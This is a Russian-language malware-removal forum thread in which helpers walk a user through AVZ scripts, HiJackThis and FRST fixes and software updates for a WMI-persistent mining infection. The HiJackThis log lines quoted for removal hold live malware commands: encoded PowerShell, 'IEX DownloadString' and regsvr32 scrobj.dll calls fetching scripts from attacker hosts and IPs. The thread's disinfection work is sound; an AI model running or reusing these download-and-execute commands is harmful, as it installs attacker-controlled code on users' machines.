Вирус в harddisc0/dr0 [HEUR:Trojan.Win32.DiskWriter.gen]

Закройте все программы, [URL="http://virusinfo.info/showthread.php?t=130828"][B]временно[/B] выгрузите антивирус, файрволл и прочее защитное ПО[/URL].

[B][COLOR="#000080"]Важно![/COLOR][/B] на Windows Vista/7/8 AVZ запускайте через контекстное меню проводника от имени Администратора. [URL="http://virusinfo.info/showthread.php?t=7239"]Выполните скрипт в АВЗ[/URL] (Файл - Выполнить скрипт):

[CODE]
begin
RegKeyIntParamWrite('HKCU', 'Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced','HideFileExt', 0);
QuarantineFile('c:\windows\debug\ok.dat','');
QuarantineFile('c:\windows\help\lsmosee.exe>','');
QuarantineFile('c:\windows\debug\item.dat>','');
QuarantineFile('c:\windows\debug\item.dat','');
QuarantineFile('c:\windows\update.exe>','');
RegKeyParamDel('HKEY_LOCAL_MACHINE','Software\Microsoft\Windows\CurrentVersion\Run','start','x32');
RegKeyParamDel('HKEY_LOCAL_MACHINE','Software\Microsoft\Windows\CurrentVersion\Run','start','x64');
RegKeyDel('HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Shared Tools\MSConfig\startupreg\start1','x64');
DeleteFile('c:\windows\update.exe>','64');
DeleteFile('c:\windows\debug\item.dat','64');
DeleteFile('c:\windows\debug\item.dat>','64');
DeleteFile('c:\windows\help\lsmosee.exe>','64');
DeleteSchedulerTask('Mysa3');
DeleteSchedulerTask('Mysa2');
DeleteSchedulerTask('Mysa1');
DeleteSchedulerTask('Mysa');
DeleteFile('c:\windows\debug\ok.dat','64');
DeleteSchedulerTask('ok');
ExecuteWizard('TSW',2,3,true);
ExecuteSysClean;
RebootWindows(true);
end.
[/CODE]

[B]Внимание![/B] Будет выполнена перезагрузка компьютера. После перезагрузки компьютера [URL="http://virusinfo.info/showthread.php?t=7239"]выполните скрипт[/URL] в АВЗ:

[CODE]begin
CreateQurantineArchive(GetAVZDirectory+'quarantine.zip');
end.[/CODE]

Пришлите карантин согласно Приложения 2 правил по красной ссылке [B]Прислать запрошенный карантин[/B] вверху темы

[URL="http://virusinfo.info/showthread.php?t=165835"]Пофиксите[/URL] следующие строчки в HiJackThis (используйте версию из папки Автологгера).

[CODE]
O7 - IPSec: Name: win (2018/12/31) - {10e49a45-7af2-4825-8139-dbed31562ca9} - Source: Any IP - Destination: my IP (Port 135 TCP) (mirrored) - Action: Block
O7 - IPSec: Name: win (2018/12/31) - {10e49a45-7af2-4825-8139-dbed31562ca9} - Source: Any IP - Destination: my IP (Port 137 TCP) (mirrored) - Action: Block
O7 - IPSec: Name: win (2018/12/31) - {10e49a45-7af2-4825-8139-dbed31562ca9} - Source: Any IP - Destination: my IP (Port 138 TCP) (mirrored) - Action: Block
O7 - IPSec: Name: win (2018/12/31) - {10e49a45-7af2-4825-8139-dbed31562ca9} - Source: Any IP - Destination: my IP (Port 139 TCP) (mirrored) - Action: Block
O7 - IPSec: Name: win (2018/12/31) - {10e49a45-7af2-4825-8139-dbed31562ca9} - Source: Any IP - Destination: my IP (Port 445 TCP) (mirrored) - Action: Block
O25 - WMI Event: fuckyoumm2_consumer - fuckyoumm2_filter - var toff=3000;var url1 = "http://wmi.0814ok.info:8888/kill.html";http = new ActiveXObject("Msxml2.ServerXMLHTTP");fso = new ActiveXObject("Scripting.FilesystemObject");wsh = new ActiveXObject("WScript.Shell");http.open("GET", url1, false);http.send();str = http.responseText;arr = str.split("\r\n");f(1730 bytes)
O25 - WMI Event: fuckyoumm4 - fuckyoumm3 - Event="__InstanceModificationEvent WITHIN 10800 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System'", cmd /c powershell.exe -nop -enc JAB3AGMAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ADsAJAB3AGMALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AdwBtAGkALgAxADIAMQA3AGIAeQBlAC4AaABvAHMAdAA6ADgAOAA4ADgALwAyAC4AdAB4AHQAIgApAC4AdAByAGkAbQAoACkAIAAtAHMAcABsAGkAdAAgACIAWwBcAHIAXABuAF0AKwAiAHwAJQB7ACQAbgA9ACQAXwAuAHMAcABsAGkAdAAoACIALwAiACkAWwAtADEAXQA7ACQAdwBjAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAkAF8ALAAgACQAbgApADsAcwB0AGEAcgB0ACAAJABuADsAfQA=&powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://wmi.1217bye.host:8888/S.ps1')&powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://173.208.139.170/s.txt')&powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://35.182.171.137/s.jpg')||regsvr32 /u /s /i:http://wmi.1217bye.host:8888/1.txt scrobj.dll&regsvr32 /u /s /i:http://173.208.139.170/2.txt scrobj.dll&regsvr32 /u /s /i:http://35.182.171.137/3.txt scrobj.dll
[/CODE]

Сделайте повторные логи по [url=http://virusinfo.info/pravila.html]правилам[/url]

Сделайте лог TDSSKiller.

TDSSKiller нашел в том самом месте угрозу, предложил "лечить". Я подтвердил, произошло лечение, но при перезагрузке компьютера он напрочь завис. Пришлось отключать питание и включать заново. После включения ещё раз прогнал этой прогой, угроз, вроде, нет.
Логи с TDSSKiller 2 штуки залил, до и после перезагрузки компа с зависанием после лечения.

Скачайте [url=http://www.bleepingcomputer.com/download/farbar-recovery-scan-tool/][b]Farbar Recovery Scan Tool[/b][/url] [img]http://i.imgur.com/NAAC5Ba.png[/img] и сохраните на Рабочем столе.

[b]Примечание[/b]: необходимо выбрать версию, совместимую с Вашей операционной системой. Если Вы не уверены, какая версия подойдет для Вашей системы, скачайте обе и попробуйте запустить. Только одна из них запустится на Вашей системе.
[list=1][*]Запустите программу двойным щелчком. Когда программа запустится, нажмите [b]Yes[/b] для соглашения с предупреждением.[*]Убедитесь, что под окном [b]Optional Scan[/b] отмечены [i]"List BCD"[/i], [i]"Driver MD5"[/i] и [i]"90 Days Files"[/i].[*]Нажмите кнопку [b]Scan[/b].[*]После окончания сканирования будет создан отчет ([b]FRST.txt[/b]) в той же папке, откуда была запущена программа. Пожалуйста, прикрепите отчет в следующем сообщении.[*]Если программа была запущена в первый раз, будет создан отчет ([b]Addition.txt[/b]). Пожалуйста, прикрепите его в следующем сообщении.[/list]
[img]http://i.imgur.com/3munStB.png[/img]

создало 3 текстовых документа, все прикрепил

[B][COLOR="#FF0000"]ВНИМАНИЕ![/COLOR][/B] Данный скрипт написан специально для этого пользователя, использование его на другом компьютере может привести к неработоспособности Windows!

[list=1][*][URL="https://clck.ru/9knjD"][B]Временно[/B] выгрузите антивирус, файрволл и прочее защитное ПО[/URL].[*]Скопируйте приведенный ниже текст в Блокнот[COLOR="#0000FF"] в кодировке Юникод[/COLOR] и сохраните файл как [b]fixlist.txt[/b] в ту же папку откуда была запущена утилита Farbar Recovery Scan Tool:
[code]
CreateRestorePoint:
CloseProcesses:
FF ExtraCheck: C:\Program Files\mozilla firefox\defaults\pref\autoconfig.js [2018-11-08] <==== ATTENTION (Points to *.cfg file)
FF ExtraCheck: C:\Program Files\mozilla firefox\cck2.cfg [2018-11-08] <==== ATTENTION
C:\Users\Артем2\AppData\Local\Google\Chrome\User Data\Default\Extensions\lalfiodohdgaejjccfgfmmngggpplmhp
2019-02-02 23:13 - 2019-02-08 16:44 - 000662528 _____ (Zhuhai Kingsoft Office Software Co.,Ltd) C:\Windows\SysWOW64\Drivers\64.exe
2019-02-02 20:08 - 2019-02-08 13:41 - 000000080 _____ C:\Windows\system32\s
2019-02-02 20:08 - 2019-02-08 13:41 - 000000078 _____ C:\Windows\system32\ps
2019-02-02 20:08 - 2019-02-08 13:41 - 000000076 _____ C:\Windows\system32\p
2018-12-29 02:01 - 2019-02-08 16:44 - 000008756 _____ C:\Windows\system32\c.txt
2018-12-29 02:01 - 2019-01-01 12:29 - 000336274 _____ C:\Windows\system32\a.txt
2018-12-29 02:01 - 2018-12-29 02:01 - 000017876 _____ C:\Windows\system32\b.txt
2018-12-09 15:11 - 2018-12-09 15:11 - 000002121 _____ C:\Windows\system32\nvidia.txt
2018-12-07 21:14 - 2019-02-08 16:44 - 000027136 _____ (Microsoft Corporation) C:\Windows\system\down.exe
2018-12-07 21:14 - 2018-12-31 10:09 - 000000406 _____ C:\Windows\config.txt
2018-12-07 21:14 - 2018-12-31 10:09 - 000000336 _____ C:\Windows\pools.txt
2018-12-07 21:14 - 2018-12-31 10:09 - 000000084 _____ C:\Program Files\Common Files\xp.dat
2018-12-07 21:13 - 2019-02-08 16:43 - 000000084 _____ C:\Program Files\Common Files\xpdown.dat
2018-12-07 21:13 - 2018-12-07 21:13 - 000000005 _____ C:\Windows\system32\1.txt
Folder: C:\Windows\system32\%APPDATA%
Folder: C:\Windows\SysWOW64\%APPDATA%
2018-12-07 21:14 - 2018-12-31 10:09 - 000000084 _____ () C:\Program Files\Common Files\xp.dat
2018-12-07 21:13 - 2019-02-08 16:43 - 000000084 _____ () C:\Program Files\Common Files\xpdown.dat
WMI:subscription\__FilterToConsumerBinding->CommandLineEventConsumer.Name=\"BVTConsumer\"",Filter="__EventFilter.Name=\"BVTFilter\"::
WMI:subscription\__FilterToConsumerBinding->LogFileEventConsumer.Name=\"ProgramChangeConsumer\"",Filter="__EventFilter.Name=\"ProgramChangeFilter\"::
WMI:subscription\__FilterToConsumerBinding->LogFileEventConsumer.Name=\"DeviceChangeConsumer\"",Filter="__EventFilter.Name=\"DeviceChangeFilter\"::
WMI:subscription\__EventFilter->BVTFilter::[Query => SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 99]
WMI:subscription\__EventFilter->ProgramChangeFilter::[Query => select * from RegistryTreeChangeEvent within 10 where Hive = 'HKEY_LOCAL_MACHINE' and RootPath='SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall']
WMI:subscription\__EventFilter->DeviceChangeFilter::[Query => select * from __instanceOperationEvent within 10 where targetInstance isa 'win32_PnPEntity']
WMI:subscription\CommandLineEventConsumer->BVTConsumer::[CommandLineTemplate => cscript KernCap.vbs][WorkingDirectory => C:\\tools\\kernrate]
WMI:subscription\LogFileEventConsumer->ProgramChangeConsumer::
WMI:subscription\LogFileEventConsumer->DeviceChangeConsumer::
[/code][*]Запустите FRST и нажмите один раз на кнопку [b]Fix[/b] и подождите. Программа создаст лог-файл ([b]Fixlog.txt[/b]). Пожалуйста, прикрепите его в следующем сообщении![*]Обратите внимание, что компьютер будет [b]перезагружен[/b].[*][B][COLOR="Blue"]Внимание![/COLOR][/B] Если на рабочем столе будет создан архив [b]Дата_время.zip[/b], то загрузите этот архив через [url=http://virusinfo.info/upload_virus.php?tid=37678]данную форму[/url][/list]

Сделайте новые логи FRST.txt, Addition.txt

Сделал, вроде ошибок при выполнении или при перезагрузках компа не выскакивало

Логи в порядке.

Вот теперь, думаю, точно вылечили.
Спасибо большое за помощь!)

[LIST][*]Для профилактики и защиты от повторных заражений загрузите [B]SecurityCheck by glax24[/B] [URL="https://clck.ru/9aDKp"]отсюда[/URL] и сохраните утилиту на [I]Рабочем столе[/I][*]Запустите двойным щелчком мыши (если Вы используете [I]Windows XP[/I]) или из меню по щелчку правой кнопки мыши [I]Запустить от имени администратора[/I] (если Вы используете [I]Windows Vista/7[/I])[*]Если увидите [U]предупреждение от вашего фаервола[/U] относительно программы SecurityCheck, не блокируйте ее работу.[*]Дождитесь окончания сканирования, откроется лог в блокноте с именем [B]SecurityCheck.txt[/B];[*]Если Вы закрыли Блокнот, то найти этот файл можно в корне системного диска в папке с именем [I]SecurityCheck[/I], например [I][COLOR="Blue"]C:\SecurityCheck\SecurityCheck.txt[/COLOR][/I][*]Прикрепите отчет в вашей теме[/LIST]

Вот

Обновите:

Internet Explorer 8.0.7601.17514 [color=red][b]Внимание! [url=http://windows.microsoft.com/ru-ru/internet-explorer/ie-11-worldwide-languages]Скачать обновления[/url][/b][/color]
[color=blue][b]^Онлайн установка. Последняя версия доступна при включенном обновлении Windows через интернет.^[/b][/color]

[color=red][b]Автоматическое обновление отключено[/b][/color] - рекомендуется включить

------------------------------- [ HotFix ] --------------------------------
HotFix KB3115858 [color=red][b]Внимание! [url=https://www.catalog.update.microsoft.com/Search.aspx?q=KB3115858]Скачать обновления[/url][/b][/color]
HotFix KB3140735 [color=red][b]Внимание! [url=https://docs.microsoft.com/en-us/security-updates/securitybulletins/2016/ms16-026]Скачать обновления[/url][/b][/color]
HotFix KB3138910 [color=red][b]Внимание! [url=https://www.catalog.update.microsoft.com/Search.aspx?q=KB3138910]Скачать обновления[/url][/b][/color]
HotFix KB3138962 [color=red][b]Внимание! [url=https://www.catalog.update.microsoft.com/Search.aspx?q=KB3138962]Скачать обновления[/url][/b][/color]
HotFix KB3145739 [color=red][b]Внимание! [url=https://www.catalog.update.microsoft.com/Search.aspx?q=KB3145739]Скачать обновления[/url][/b][/color]
HotFix KB3146963 [color=red][b]Внимание! [url=https://www.catalog.update.microsoft.com/Search.aspx?q=KB3146963]Скачать обновления[/url][/b][/color]
HotFix KB3156013 [color=red][b]Внимание! [url=https://www.catalog.update.microsoft.com/Search.aspx?q=KB3156013]Скачать обновления[/url][/b][/color]
HotFix KB3156016 [color=red][b]Внимание! [url=https://www.catalog.update.microsoft.com/Search.aspx?q=KB3156016]Скачать обновления[/url][/b][/color]
HotFix KB3155178 [color=red][b]Внимание! [url=https://www.catalog.update.microsoft.com/Search.aspx?q=KB3155178]Скачать обновления[/url][/b][/color]
HotFix KB3153171 [color=red][b]Внимание! [url=https://www.catalog.update.microsoft.com/Search.aspx?q=KB3153171]Скачать обновления[/url][/b][/color]
HotFix KB3170455 [color=red][b]Внимание! [url=https://www.catalog.update.microsoft.com/Search.aspx?q=KB3170455]Скачать обновления[/url][/b][/color]
HotFix KB3178034 [color=red][b]Внимание! [url=https://www.catalog.update.microsoft.com/Search.aspx?q=KB3178034]Скачать обновления[/url][/b][/color]
HotFix KB3185911 [color=red][b]Внимание! [url=https://www.catalog.update.microsoft.com/Search.aspx?q=KB3185911]Скачать обновления[/url][/b][/color]
HotFix KB3184122 [color=red][b]Внимание! [url=https://www.catalog.update.microsoft.com/Search.aspx?q=KB3184122]Скачать обновления[/url][/b][/color]
HotFix KB3192391 [color=red][b]Внимание! [url=https://www.catalog.update.microsoft.com/Search.aspx?q=KB3192391]Скачать обновления[/url][/b][/color]
HotFix KB3197867 [color=red][b]Внимание! [url=https://www.catalog.update.microsoft.com/Search.aspx?q=KB3197867]Скачать обновления[/url][/b][/color]
HotFix KB3205394 [color=red][b]Внимание! [url=https://www.catalog.update.microsoft.com/Search.aspx?q=KB3205394]Скачать обновления[/url][/b][/color]
HotFix KB4012212 [color=red][b]Внимание! [url=https://www.catalog.update.microsoft.com/Search.aspx?q=KB4012212]Скачать обновления[/url][/b][/color]
HotFix KB4019263 [color=red][b]Внимание! [url=https://www.catalog.update.microsoft.com/Search.aspx?q=KB4019263]Скачать обновления[/url][/b][/color]
HotFix KB4022722 [color=red][b]Внимание! [url=https://www.catalog.update.microsoft.com/Search.aspx?q=KB4022722]Скачать обновления[/url][/b][/color]
HotFix KB4015546 [color=red][b]Внимание! [url=https://www.catalog.update.microsoft.com/Search.aspx?q=KB4015546]Скачать обновления[/url][/b][/color]
HotFix KB4025337 [color=red][b]Внимание! [url=https://www.catalog.update.microsoft.com/Search.aspx?q=KB4025337]Скачать обновления[/url][/b][/color]
HotFix KB4034679 [color=red][b]Внимание! [url=https://www.catalog.update.microsoft.com/Search.aspx?q=KB4034679]Скачать обновления[/url][/b][/color]
HotFix KB4041678 [color=red][b]Внимание! [url=https://www.catalog.update.microsoft.com/Search.aspx?q=KB4041678]Скачать обновления[/url][/b][/color]
HotFix KB4056894 [color=red][b]Внимание! [url=https://www.catalog.update.microsoft.com/Search.aspx?q=KB4056894]Скачать обновления[/url][/b][/color]
HotFix KB4056897 [color=red][b]Внимание! [url=https://www.catalog.update.microsoft.com/Search.aspx?q=KB4056897]Скачать обновления[/url][/b][/color]
HotFix KB4074587 [color=red][b]Внимание! [url=https://www.catalog.update.microsoft.com/Search.aspx?q=KB4074587]Скачать обновления[/url][/b][/color]
HotFix KB4103712 [color=red][b]Внимание! [url=https://www.catalog.update.microsoft.com/Search.aspx?q=KB4103712]Скачать обновления[/url][/b][/color]
HotFix KB4343899 [color=red][b]Внимание! [url=https://www.catalog.update.microsoft.com/Search.aspx?q=KB4343899]Скачать обновления[/url][/b][/color]
HotFix KB4457145 [color=red][b]Внимание! [url=https://www.catalog.update.microsoft.com/Search.aspx?q=KB4457145]Скачать обновления[/url][/b][/color]
HotFix KB4462923 [color=red][b]Внимание! [url=https://www.catalog.update.microsoft.com/Search.aspx?q=KB4462923]Скачать обновления[/url][/b][/color]
HotFix KB4480970 [color=red][b]Внимание! [url=https://www.catalog.update.microsoft.com/Search.aspx?q=KB4480970]Скачать обновления[/url][/b][/color]
HotFix KB4487345 [color=red][b]Внимание! [url=https://www.catalog.update.microsoft.com/Search.aspx?q=KB4487345]Скачать обновления[/url][/b][/color]

WinRAR 5.31 (64-разрядная) v.5.31.0 [color=red][b]Внимание! [url=https://www.rarlab.com/download.htm]Скачать обновления[/url][/b][/color]
Skype, версия 8.34 v.8.34 [color=red][b]Внимание! [url=https://www.skype.com/ru/get-skype/]Скачать обновления[/url][/b][/color]
Opera Stable 57.0.3098.116 v.57.0.3098.116 [color=red][b]Внимание! [url=https://www.opera.com/ru/computer]Скачать обновления[/url][/b][/color]
[color=blue][b]^Проверьте обновления через меню О программе!^[/b][/color]
Yandex v.19.1.0.2644 [color=red][b]Внимание! [url=https://download.cdn.yandex.net/browser/yandex/ru/Yandex.exe]Скачать обновления[/url][/b][/color]
[color=blue][b]^Проверьте обновления через меню Дополнительно - О браузере Yandex!^[/b][/color]

На этом все.

Не понимаю как, но опять появляются вирусы на ССД. Интернетом там почти не пользуюсь. Похоже, это тот же самый DarkGalaxy
Прилагаю скриншоты:

Сделайте новые логи Автологгером

Был в командировке, не имел доступа к компьютеру. Прикрепил логи и 2 репорта, которые появились в папке после завершения.

С диска F загрузитесь и снимите логи Автологгера.

Но у меня нет диска F, только C и D. Они меняются местами при загрузке с ссд\харда, но буквы остаются теми же.
А, понял. На харде ссд показывает как диск F. С него были логи как раз.

Сделайте еще раз лог TDSSKiller и сделайте такой лог [url]https://clck.ru/Aea5e[/url]

Не могу загрузить логи второй программы т.к. они превышают допустимый размер для этого типа файлов (txt), файл весит 1,35мб

Упакуйте в архив, либо удалите старые вложения Мой кабинет => Вложения.

Запаковал отчёт малваря в архив.
Оказывается, пока я был в командировке, моя жена засунула все угрозы из отчёта в карантин.
Сейчас повторно просканил уже сам, угроз нет.
Карантин могу приложить, если требуется.